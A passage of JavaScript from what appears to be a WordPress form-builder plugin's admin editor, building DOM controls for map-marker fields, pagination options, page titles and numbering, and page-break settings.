			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
			
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}
		
	var t  = document.getElementById('edit_table');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);
	
	edit_main_td8.appendChild(el_label_position_label);
	edit_main_td8_1.appendChild(el_label_position1);
	edit_main_td8_1.appendChild(el_label_left);
	edit_main_td8_1.appendChild(br);
	edit_main_td8_1.appendChild(el_label_position2);
	edit_main_td8_1.appendChild(el_label_top);

	edit_main_td2.appendChild(el_label_location);
	edit_main_td2.appendChild(center1);
	edit_main_td2.setAttribute("colspan", "2");
	
	edit_main_td7.appendChild(el_map_address_label);
	edit_main_td7_1.appendChild(el_map_address);
	
	edit_main_td10.appendChild(el_map_longitude_label);
	edit_main_td10_1.appendChild(el_map_longitude);
	
	edit_main_td11.appendChild(el_map_latitude_label);
	edit_main_td11_1.appendChild(el_map_latitude);
	edit_main_td12.appendChild(el_public_label);
	edit_main_td12_1.appendChild(el_public_link);
	
	edit_main_td3.appendChild(el_label_map_size);
	edit_main_td3_1.appendChild(Width);
	edit_main_td3_1.appendChild(el_map_width);
	edit_main_td3_1.appendChild(br1);
	edit_main_td3_1.appendChild(Height);
	edit_main_td3_1.appendChild(el_map_height);

	edit_main_td4.appendChild(el_info_label);
	edit_main_td4_1.appendChild(el_info_textarea);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br2);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
		
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_tr12.appendChild(edit_main_td12);
	edit_main_tr12.appendChild(edit_main_td12_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr12);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
	element='div';
	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_mark_map");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
	
	var adding = document.createElement('div');
		adding.setAttribute("id", i+"_elementform_id_temp");
		adding.setAttribute("long0", w_long);
		adding.setAttribute("lat0", w_lat);
		adding.setAttribute("zoom", w_zoom);
		adding.style.cssText = "width:"+w_width+"px; height: "+w_height+"px";
 		adding.setAttribute("info0", w_info);
 		adding.setAttribute("center_x", w_center_x);
		adding.setAttribute("center_y", w_center_y);
		
     
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "wd_form_label");
		label.style.verticalAlign="top";
		
	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
				
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
					
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width= w_field_label_size+"px";
		div_label.style.verticalAlign="top";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
		
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
		
	var main_td  = document.getElementById('show_table');
  
	div_label.appendChild(label);
	div_element.appendChild(adding_type);
	div_element.appendChild(adding);

	div_field.appendChild(div_label);
	div_field.appendChild(div_element);
	
  
	div.appendChild(div_field);
	div.appendChild(br3);
	main_td.appendChild(div);

	if(w_field_label_pos=="top")
		label_top(i);
	change_class(w_class, i);
	refresh_attr(i, 'type_text');
	if_gmap_init(i);
	add_marker_on_map(i, 0, w_long, w_lat, w_info, true);

}

//////////////////////////////////////////////
///////////  type_page_break   //////////////////
///////////////////////////////////////////////
	
function type_page_navigation(w_type, w_show_title, w_show_numbers, w_attr_name, w_attr_value)
{
	if(need_enable)
		enable2();

	document.getElementById("element_type").value="type_page_navigation";
	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border:0px;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');

	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	edit_main_td6.setAttribute("colspan", "2");
		  
		  
	var el_pagination_opt_label = document.createElement('label');
			el_pagination_opt_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
			el_pagination_opt_label.innerHTML = "Pagination Options";
		
	var el_pagination_steps = document.createElement('input');
			el_pagination_steps.setAttribute("id", "el_pagination_steps");
			el_pagination_steps.setAttribute("type", "radio");
			el_pagination_steps.setAttribute("name", "el_pagination");
			el_pagination_steps.setAttribute("value", "steps");
			el_pagination_steps.style.cssText =   "margin-left:20px;  padding:0; border-width: 1px";
            el_pagination_steps.setAttribute("onclick", "pagination_type('steps')");
		Steps = document.createTextNode("Steps");
			
	var el_pagination_percentage = document.createElement('input');
			el_pagination_percentage.setAttribute("id", "el_pagination_percentage");
			el_pagination_percentage.setAttribute("type", "radio");
			el_pagination_percentage.setAttribute("name", "el_pagination");
			el_pagination_percentage.setAttribute("value", "percentage");
			el_pagination_percentage.style.cssText =   "margin-left:20px;  padding:0; border-width: 1px";
            el_pagination_percentage.setAttribute("onclick", "pagination_type('percentage')");
		Percentage = document.createTextNode("Percentage");
		
	var el_pagination_none = document.createElement('input');
			el_pagination_none.setAttribute("id", "el_pagination_none");
			el_pagination_none.setAttribute("type", "radio");
			el_pagination_none.setAttribute("name", "el_pagination");
			el_pagination_none.setAttribute("value", "none");
			el_pagination_none.style.cssText =   "margin-left:20px;  padding:0; border-width: 1px";
            el_pagination_none.setAttribute("onclick", "pagination_type('none')");
		 No_Context = document.createTextNode(" No Context");
		
	if(w_type=='steps')
		el_pagination_steps.setAttribute("checked","checked");
	else
		if(w_type=='percentage')
			el_pagination_percentage.setAttribute("checked","checked");
		else
			el_pagination_none.setAttribute("checked","checked");
				
	var el_show_title_label = document.createElement('label');
			el_show_title_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
			el_show_title_label.innerHTML = "Show Page Titles in Progress Bar";
		
	var el_show_title_input = document.createElement('input');
			el_show_title_input.setAttribute("id", "el_show_title_input");
			el_show_title_input.setAttribute("type", "checkbox");
			el_show_title_input.setAttribute("onClick", "show_title_pagebreak();");
			
	if(w_show_title)
		el_show_title_input.setAttribute("checked","checked");
		
	var el_show_numbers_label = document.createElement('label');
			el_show_numbers_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
			el_show_numbers_label.innerHTML = "Show Page Numbers in Footer";
		
	var el_show_numbers_input = document.createElement('input');
			el_show_numbers_input.setAttribute("id", "el_show_numbers_input");
			el_show_numbers_input.setAttribute("type", "checkbox");
			el_show_numbers_input.setAttribute("onClick", "show_numbers_pagebreak();");
			
	if(w_show_numbers)
		el_show_numbers_input.setAttribute("checked","checked");
		
	var el_pagination_class_label = document.createElement('label');
	        el_pagination_class_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
			el_pagination_class_label.innerHTML = "Pagination Class name";
	
	var el_pagination_class_input = document.createElement('input');
            el_pagination_class_input.setAttribute("id", "next_element_style");
			el_pagination_class_input.setAttribute("type", "text");
			el_pagination_class_input.setAttribute("value", "");
            el_pagination_class_input.style.cssText = "width:100px; margin-left:20px";
            el_pagination_class_input.setAttribute("onChange", "change_pagebreak_class(this.value, 'next')");		
		


	var el_page_titles_label = document.createElement('label');
	        el_page_titles_label.style.cssText ="color:#000; font-weight:bold; font-size: 13px";
			el_page_titles_label.innerHTML = "Pages Title";
			
	edit_main_td6.appendChild(el_page_titles_label);
	w_pages=[];	
	k=0;
	for(j=1; j<=form_view_max; j++)
	{
		if(document.getElementById('form_id_tempform_view'+j))
		{
			k++;
			var br_temp = document.createElement('br');
			var el_page_title_input= document.createElement('input');
			el_page_title_input.setAttribute("type", "text");
			el_page_title_input.style.cssText = "width:100px";
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title')==null)
				el_page_title_input.setAttribute("value", "Untitled Page");
			else
				el_page_title_input.setAttribute("value", document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'));
			
			el_page_title_input.setAttribute("id", "page_title_"+j);
			el_page_title_input.setAttribute("onKeyUp", "set_page_title(this.value,'"+j+"')");
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages[j]=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages[j]="Untitled Page"
				
			page_num=document.createTextNode(k+'. ');
			
			edit_main_td6.appendChild(br_temp);
			edit_main_td6.appendChild(page_num);
			edit_main_td6.appendChild(el_page_title_input);

		}
	
	}	




		
	var el_attr_label = document.createElement('label');
	                
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                
           	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr( 'type_checkbox')");

	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var hr = document.createElement('hr');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_pagination_opt_label);
	edit_main_td1.appendChild(br4);
	edit_main_td1.appendChild(el_pagination_steps);
	edit_main_td1.appendChild(Steps);
	edit_main_td1.appendChild(br6);
	edit_main_td1.appendChild(el_pagination_percentage);
	edit_main_td1.appendChild(Percentage);
	edit_main_td1.appendChild(br5);
	edit_main_td1.appendChild(el_pagination_none);
	edit_main_td1.appendChild(No_Context);
	edit_main_td1.setAttribute("colspan", "2");
	
	edit_main_td3.appendChild(el_show_title_label);
	edit_main_td3_1.appendChild(el_show_title_input);
	
	edit_main_td4.appendChild(el_show_numbers_label);
	edit_main_td4_1.appendChild(el_show_numbers_input);
/*	edit_main_td2.appendChild(el_attr_label);
	edit_main_td2.appendChild(el_attr_add);
	edit_main_td2.appendChild(br3);
	edit_main_td2.appendChild(el_attr_table);*/
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr6.appendChild(edit_main_td6);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr6);
//	edit_main_table.appendChild(edit_main_tr2);

	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

    var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", "_elemet_tableform_id_temp");
		table.setAttribute("width", "90%");
	
    var tr = document.createElement('tr');
	
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", "_element_sectionform_id_temp");
			td2.setAttribute("width", "100%");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
			
		var pages_div = document.createElement('div');
				pages_div.setAttribute("align","left");
				pages_div.setAttribute("id","pages_div");
				pages_div.style.width='100%';
				pages_div.innerHTML="";
		
		
		var numbers_div = document.createElement('div');
				numbers_div.setAttribute("align","center");
				numbers_div.setAttribute("id","numbers_div");
				numbers_div.style.width='100%';
				numbers_div.style.paddingTop='100px';
				numbers_div.innerHTML="";
		
		
				
		td2.appendChild(pages_div);
		td2.appendChild(numbers_div);
      	var main_td  = document.getElementById('show_table');
	
      
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br1);
      	main_td.appendChild(div);
		
	if(w_type=='steps')
		make_page_steps(w_pages);
	else
		if(w_type=='percentage')
			make_page_percentage(w_pages);
		else
			make_page_none(w_pages);
			
	if(w_show_numbers)
		show_numbers_pagebreak();
		


//refresh_attr(i, 'type_checkbox');
}

function set_page_title(title, id) {
  title = title.replace(/(<([^>]+)>)/ig, "");
	document.getElementById("form_id_tempform_view"+id).setAttribute('page_title',title);
	show_title_pagebreak();
}

function show_numbers_pagebreak()
{
	document.getElementById("numbers_div").innerHTML="";
	if(document.getElementById("el_show_numbers_input").checked)
	{
		k=0;
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById('form_id_tempform_view'+j))
			{
				k++;		
				if(j==form_view)
					page_number=k;
			}
		}
		
		var cur = document.createElement('span');
			cur.setAttribute("class", "page_numbersform_id_temp");
			cur.innerHTML=page_number+'/'+k;
			
		document.getElementById("numbers_div").appendChild(cur);
	}
}

function refresh_page_numbers()
{
	k=0;
	if(document.getElementById('pages').getAttribute('show_numbers')=='true')
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById('page_numbersform_id_temp'+j))
			{
				k++;		
			}
		}
		
	cur_num=0;
	
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById('page_numbersform_id_temp'+j))
			{
				cur_num++;		
		
				document.getElementById("page_numbersform_id_temp"+j).innerHTML='';
				
				if(document.getElementById('pages').getAttribute('show_numbers')=='true')
				{
					var cur = document.createElement('span');
						cur.setAttribute("class", "page_numbersform_id_temp");
						cur.innerHTML=cur_num+'/'+k;
						
					document.getElementById("page_numbersform_id_temp"+j).appendChild(cur);
				}
			}
		}

}

function pagination_type(type)
{
	document.getElementById("pages_div").innerHTML="";
	w_pages=[];	
	k=0;
	for(j=1; j<=form_view_max; j++)
	{
		if(document.getElementById('form_id_tempform_view'+j))
		{
			k++;
			if(document.getElementById('form_id_tempform_view'+j).getAttribute('page_title'))
				w_pages[j]=document.getElementById('form_id_tempform_view'+j).getAttribute('page_title');
			else
				w_pages[j]="none";
		}
		
	}	


	if(type=='steps')
		make_page_steps(w_pages);
	else
		if(type=='percentage')
			make_page_percentage(w_pages);
		else
			make_page_none();
			

}

function show_title_pagebreak()
{
	document.getElementById("pages_div").innerHTML="";

if(document.getElementById("el_pagination_steps").checked)
	pagination_type('steps');
else
	if(document.getElementById("el_pagination_percentage").checked)
		pagination_type('percentage');
}
function make_page_steps(w_pages)
{
	document.getElementById("pages_div").innerHTML="";
	show_title=document.getElementById('el_show_title_input').checked;
	k=0;
	for(j=1; j<=form_view_max; j++)
	{	
		if(w_pages[j])
			{
			k++;
			if(w_pages[j]=="none")	
				w_pages[j]='';	
			page_number = document.createElement('span');
			
			if(j==form_view)
				page_number.setAttribute('class',"page_active");
			else
				page_number.setAttribute('class',"page_deactive");
			if(show_title)
			{
				page_number.innerHTML=w_pages[j];
			}
			else
				page_number.innerHTML=k;
			
			document.getElementById("pages_div").appendChild(page_number);
		}
	}
	
}

function make_page_percentage(w_pages)
{
	document.getElementById("pages_div").innerHTML="";
	show_title=document.getElementById('el_show_title_input').checked;
	
    var div_parent = document.createElement('div');
       	div_parent.setAttribute("class", "page_percentage_deactive");

    var div = document.createElement('div');
       	div.setAttribute("id", "div_percentage");
       	div.setAttribute("class", "page_percentage_active");
		
	var b = document.createElement('b');

	div.appendChild(b);
	
	k=0;
	cur_page_title='';
	for(j=1; j<=form_view_max; j++)
	{	
		if(w_pages[j])
			{
			k++;
				
			if(w_pages[j]=="none")	
				w_pages[j]='';	
			if(j==form_view)
			{
				if(show_title)
				{ 
					var cur_page_title = document.createElement('span');
					if(k==1)
						cur_page_title.style.paddingLeft="30px";
					else
						cur_page_title.style.paddingLeft="5px";
						cur_page_title.innerHTML=w_pages[j];
				}
				page_number=k;

			}
		}
	}
	b.innerHTML=Math.round(((page_number-1)/k)*100)+'%';
	div.style.width=((page_number-1)/k)*100+'%';
	div_parent.appendChild(div);
	if(cur_page_title)
		div_parent.appendChild(cur_page_title);
	document.getElementById("pages_div").appendChild(div_parent);

	
}
function make_page_none()
{
	document.getElementById("pages_div").innerHTML="";
}


function type_page_break(i,w_page_title, w_title , w_type , w_class, w_check, w_attr_name, w_attr_value) {
	var pos = document.getElementsByName("el_pos");
		pos[0].setAttribute("disabled", "disabled");
		pos[1].setAttribute("disabled", "disabled");
		pos[2].setAttribute("disabled", "disabled");
		
	var sel_el_pos = document.getElementById("sel_el_pos");
		sel_el_pos.setAttribute("disabled", "disabled");

	document.getElementById("element_type").value="type_page_break";
	delete_last_child();
	
	var edit_div = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
	
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10 = document.createElement('tr');
	var edit_main_tr11  = document.createElement('tr');
	
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	var edit_main_td11 = document.createElement('td');
	var edit_main_td11_1 = document.createElement('td');
		  
	var el_page_title_label = document.createElement('label');
		el_page_title_label.setAttribute("class", "fm-field-label");
		el_page_title_label.setAttribute("for", "el_page_title_input");
		el_page_title_label.innerHTML = "Page Title";
		
	var el_page_title_input = document.createElement('input');
		el_page_title_input.setAttribute("id", "el_page_title_input");
		el_page_title_input.setAttribute("type", "text");
		el_page_title_input.setAttribute("name", "el_page_title_input");
		el_page_title_input.setAttribute("value", w_page_title);
		el_page_title_input.setAttribute("onKeyup", "pagebreak_title_change(this.value,'"+i+"')");
		  	  
	var el_type_next_label = document.createElement('label');
		el_type_next_label.setAttribute("class", "fm-field-label");
		el_type_next_label.setAttribute("for", "el_type_next_text");
		el_type_next_label.innerHTML = "Next Type";
		
	var el_type_next_text = document.createElement('input');
		el_type_next_text.setAttribute("id", "el_type_next_text");
		el_type_next_text.setAttribute("type", "radio");
		el_type_next_text.setAttribute("name", "el_type_next");
		el_type_next_text.setAttribute("value", "text");
		el_type_next_text.setAttribute("onclick", "pagebreak_type_change('next','text')");
		
	var el_label_text_next = document.createElement('label');
		el_label_text_next.setAttribute("for", "el_type_next_text");
        el_label_text_next.innerHTML = "Text";	

	var el_type_next_img = document.createElement('input');
		el_type_next_img.setAttribute("id", "el_type_next_img");
		el_type_next_img.setAttribute("type", "radio");
		el_type_next_img.setAttribute("name", "el_type_next");
		el_type_next_img.setAttribute("value", "img");
		el_type_next_img.setAttribute("onclick", "pagebreak_type_change('next','img')");
		
	var el_label_image_next = document.createElement('label');
		el_label_image_next.setAttribute("for", "el_type_next_img");
        el_label_image_next.innerHTML = "Image";		

	if(w_type[0] == 'text')
		el_type_next_text.setAttribute("checked","checked");
	else
		el_type_next_img.setAttribute("checked","checked");
				
	var el_title_next_label = document.createElement('label');
		el_title_next_label.setAttribute("class", "fm-field-label");
		el_title_next_label.setAttribute("for", "el_title_next");
		el_title_next_label.setAttribute("id", "next_label");
		el_title_next_label.innerHTML = "Next text name";
		
	var el_title_next = document.createElement('input');
		el_title_next.setAttribute("id", "el_title_next");
		el_title_next.setAttribute("type", "text");
		el_title_next.setAttribute("value", w_title[0]);
		el_title_next.setAttribute("onKeyUp", "change_pagebreak_label( this.value, 'next');");
		el_title_next.setAttribute("onChange", "change_pagebreak_label( this.value, 'next');");
			
	var el_style_next_label = document.createElement('label');
		el_style_next_label.setAttribute("class", "fm-field-label");
		el_style_next_label.setAttribute("for", "next_element_style");
		el_style_next_label.innerHTML = "Next class name";
	
	var el_style_next_textarea = document.createElement('input');
		el_style_next_textarea.setAttribute("id", "next_element_style");
		el_style_next_textarea.setAttribute("type", "text");
		el_style_next_textarea.setAttribute("value", w_class[0]);
		el_style_next_textarea.setAttribute("onChange", "change_pagebreak_class(this.value, 'next')");

	var el_check_next_label = document.createElement('label');
		el_check_next_label.setAttribute("class", "fm-field-label");
		el_check_next_label.setAttribute("for", "el_check_next_input");
		el_check_next_label.innerHTML = "Check the required fields";
		
	var el_check_next_input = document.createElement('input');
		el_check_next_input.setAttribute("id", "el_check_next_input");
		el_check_next_input.setAttribute("type", "checkbox");
		el_check_next_input.setAttribute("onClick", "set_checkable('next');");
			
	if(w_check[0] == "true")
		el_check_next_input.setAttribute("checked","checked");
				
	var el_type_previous_label = document.createElement('label');
		el_type_previous_label.setAttribute("class", "fm-field-label");
		el_type_previous_label.setAttribute("for", "el_type_previous_text");
		el_type_previous_label.innerHTML = "Previous Type";
			
	var el_type_previous_text = document.createElement('input');
		el_type_previous_text.setAttribute("id", "el_type_previous_text");
		el_type_previous_text.setAttribute("type", "radio");
		el_type_previous_text.setAttribute("name", "el_type_previous");
		el_type_previous_text.setAttribute("value", "text");
		el_type_previous_text.setAttribute("onclick", "pagebreak_type_change('previous','text')");
		
	var el_label_text_previous = document.createElement('label');
		el_label_text_previous.setAttribute("for", "el_type_previous_text");
        el_label_text_previous.innerHTML = "Text";	
		
	var el_type_previous_img = document.createElement('input');
		el_type_previous_img.setAttribute("id", "el_type_previous_img");
		el_type_previous_img.setAttribute("type", "radio");
		el_type_previous_img.setAttribute("name", "el_type_previous");
		el_type_previous_img.setAttribute("value", "img");
		el_type_previous_img.setAttribute("onclick", "pagebreak_type_change('previous','img')");
		
	var el_label_image_previous = document.createElement('label');
		el_label_image_previous.setAttribute("for", "el_type_previous_img");
        el_label_image_previous.innerHTML = "Image";	

	if(w_type[1] == 'text')
		el_type_previous_text.setAttribute("checked","checked");
	else
		el_type_previous_img.setAttribute("checked","checked");
				
	var el_title_previous_label = document.createElement('label');
		el_title_previous_label.setAttribute("class", "fm-field-label");
		el_title_previous_label.setAttribute("id", "previous_label");
		el_title_previous_label.innerHTML = "Previous text name";
		
	var el_title_previous = document.createElement('input');
